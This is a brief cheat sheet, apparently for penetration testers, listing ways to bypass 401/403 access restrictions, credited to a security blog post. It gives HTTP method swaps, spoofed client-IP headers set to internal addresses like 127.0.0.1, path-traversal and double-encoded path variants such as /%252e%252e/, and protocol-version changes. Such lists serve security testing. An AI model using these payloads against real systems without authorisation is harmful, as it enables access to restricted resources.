Change Http Methods:
GET
HEAD
POST
PUT
DELETE
CONNECT
OPTIONS
TRACE
PATCH

Changing User Agent:

Changing Headers:

Headers:
- X-Forwarded-For
- X-Forward-For
- X-Forwarded-Host
- X-Forwarded-Proto
- Forwarded
- Via
- X-Real-IP
- X-Remote-IP
- X-Remote-Addr
- X-Trusted-IP
- X-Requested-By
- X-Requested-For
- X-Forwarded-Server
    
Values:
- 10.0.0.0
- 10.0.0.1
- 127.0.0.1
- 127.0.0.1:443
- 127.0.0.1:80
- localhost
- 172.16.0.0


Changing Path:

/../
/...
/..%00
/..%01
/..%0a
/..%0d
/..%09
/~root
/~admin
/%20/
/%2e%2e/
/%252e%252e/
/%c0%af/
/%e0%80%af
/%2e/
/%252e/

Change the protocol:
0.9
1.0
1.1
2



Source : https://blog.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/#:~:text=This%20is%20another%20useful%20method,also%20try%20other%20creative%20literals
